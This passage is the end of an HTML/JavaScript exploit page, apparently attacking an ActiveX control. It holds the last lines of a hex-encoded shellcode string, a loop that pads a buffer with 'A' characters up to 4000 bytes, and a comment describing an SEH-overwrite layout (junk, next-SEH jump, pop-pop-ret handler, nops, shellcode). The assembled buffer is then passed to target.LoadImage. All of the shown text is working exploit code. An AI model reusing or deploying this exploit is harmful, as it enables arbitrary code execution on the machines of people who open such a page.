"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
{
buff += "A";
}
// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
fbuff = arg1 + nseh + seh + nops + sc + buff;
target.LoadImage(fbuff);
</script>
</html>